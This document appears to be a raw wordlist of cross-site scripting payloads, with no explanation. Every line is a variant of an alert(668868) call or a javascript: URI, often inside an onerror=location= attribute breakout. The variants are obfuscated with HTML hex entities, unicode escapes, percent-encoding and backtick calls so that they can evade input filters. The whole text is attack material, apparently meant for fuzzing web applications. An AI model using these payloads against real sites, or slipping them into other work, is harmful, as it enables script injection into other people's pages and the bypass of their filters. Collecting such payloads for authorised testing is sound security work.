alert(668868)
&#x61&#x6c&#x65&#x72&#x74&#x28&#x36&#x36&#x38&#x38&#x36&#x38&#x29
&#x61&#x6c&#x65&#x72&#x74&#x28&#x36&#x36&#x38&#x38&#x36&#x38&#x29
\u0061\u006c\u0065\u0072\u0074(668868)
\u0061\u006c\u0065\u0072\u0074`668868`
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x5c&#x75&#x30&#x30&#x36&#x31&#x5c&#x75&#x30&#x30&#x36&#x63&#x5c&#x75&#x30&#x30&#x36&#x35&#x5c&#x75&#x30&#x30&#x37&#x32&#x5c&#x75&#x30&#x30&#x37&#x34&#x28&#x36&#x36&#x38&#x38&#x36&#x38&#x29
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x5c&#x75&#x30&#x30&#x36&#x31&#x5c&#x75&#x30&#x30&#x36&#x63&#x5c&#x75&#x30&#x30&#x36&#x35&#x5c&#x75&#x30&#x30&#x37&#x32&#x5c&#x75&#x30&#x30&#x37&#x34&#x28&#x36&#x36&#x38&#x38&#x36&#x38&#x29=location="javascript:\u0061\u006c\u0065\u0072\u0074(668868)">
=location="javascript:\u0061\u006c\u0065\u0072\u0074`668868`">
=location="javascript:%61%6c%65%72%74%28%36%36%38%38%36%38%29">
=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a\u0061\u006c\u0065\u0072\u0074(668868)">
=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a\u0061\u006c\u0065\u0072\u0074`668868`">
=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(668868)">
=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x5c&#x75&#x30&#x30&#x36&#x31&#x5c&#x75&#x30&#x30&#x36&#x63&#x5c&#x75&#x30&#x30&#x36&#x35&#x5c&#x75&#x30&#x30&#x37&#x32&#x5c&#x75&#x30&#x30&#x37&#x34&#x28&#x36&#x36&#x38&#x38&#x36&#x38&#x29">
=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x5c&#x75&#x30&#x30&#x36&#x31&#x5c&#x75&#x30&#x30&#x36&#x63&#x5c&#x75&#x30&#x30&#x36&#x35&#x5c&#x75&#x30&#x30&#x37&#x32&#x5c&#x75&#x30&#x30&#x37&#x34&#x60&#x36&#x36&#x38&#x38&#x36&#x38&#x60">
=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x25&#x36&#x31&#x25&#x36&#x63&#x25&#x36&#x35&#x25&#x37&#x32&#x25&#x37&#x34&#x25&#x32&#x38&#x25&#x33&#x36&#x25&#x33&#x36&#x25&#x33&#x38&#x25&#x33&#x38&#x25&#x33&#x36&#x25&#x33&#x38&#x25&#x32&#x39">
" onerror=location="javascript:\u0061\u006c\u0065\u0072\u0074(668868)">
" onerror=location="javascript:\u0061\u006c\u0065\u0072\u0074`668868`">
" onerror=location="javascript:%61%6c%65%72%74%28%36%36%38%38%36%38%29">
" onerror=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a\u0061\u006c\u0065\u0072\u0074(668868)">
" onerror=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a\u0061\u006c\u0065\u0072\u0074`668868`">
" onerror=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a%61%6c%65%72%74%28%36%36%38%38%36%38%29">
" onerror=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x5c&#x75&#x30&#x30&#x36&#x31&#x5c&#x75&#x30&#x30&#x36&#x63&#x5c&#x75&#x30&#x30&#x36&#x35&#x5c&#x75&#x30&#x30&#x37&#x32&#x5c&#x75&#x30&#x30&#x37&#x34&#x28&#x36&#x36&#x38&#x38&#x36&#x38&#x29">
" onerror=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x5c&#x75&#x30&#x30&#x36&#x31&#x5c&#x75&#x30&#x30&#x36&#x63&#x5c&#x75&#x30&#x30&#x36&#x35&#x5c&#x75&#x30&#x30&#x37&#x32&#x5c&#x75&#x30&#x30&#x37&#x34&#x60&#x36&#x36&#x38&#x38&#x36&#x38&#x60">
" onerror=location="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x25&#x36&#x31&#x25&#x36&#x63&#x25&#x36&#x35&#x25&#x37&#x32&#x25&#x37&#x34&#x25&#x32&#x38&#x25&#x33&#x36&#x25&#x33&#x36&#x25&#x33&#x38&#x25&#x33&#x38&#x25&#x33&#x36&#x25&#x33&#x38&#x25&#x32&#x39">
javascript:\u0061\u006c\u0065\u0072\u0074(668868)>
javascript:\u0061\u006c\u0065\u0072\u0074`668868`>
javascript:%61%6c%65%72%74%28%36%36%38%38%36%38%29
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a\u0061\u006c\u0065\u0072\u0074(668868)>
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a\u0061\u006c\u0065\u0072\u0074`668868`>
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a%61%6c%65%72%74%28%36%36%38%38%36%38%29>
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x5c&#x75&#x30&#x30&#x36&#x31&#x5c&#x75&#x30&#x30&#x36&#x63&#x5c&#x75&#x30&#x30&#x36&#x35&#x5c&#x75&#x30&#x30&#x37&#x32&#x5c&#x75&#x30&#x30&#x37&#x34&#x28&#x36&#x36&#x38&#x38&#x36&#x38&#x29&#x3e
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x5c&#x75&#x30&#x30&#x36&#x31&#x5c&#x75&#x30&#x30&#x36&#x63&#x5c&#x75&#x30&#x30&#x36&#x35&#x5c&#x75&#x30&#x30&#x37&#x32&#x5c&#x75&#x30&#x30&#x37&#x34&#x60&#x36&#x36&#x38&#x38&#x36&#x38&#x60&#x3e
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x25&#x36&#x31&#x25&#x36&#x63&#x25&#x36&#x35&#x25&#x37&#x32&#x25&#x37&#x34&#x25&#x32&#x38&#x25&#x33&#x36&#x25&#x33&#x36&#x25&#x33&#x38&#x25&#x33&#x38&#x25&#x33&#x36&#x25&#x33&#x38&#x25&#x32&#x39&#x25&#x33&#x65
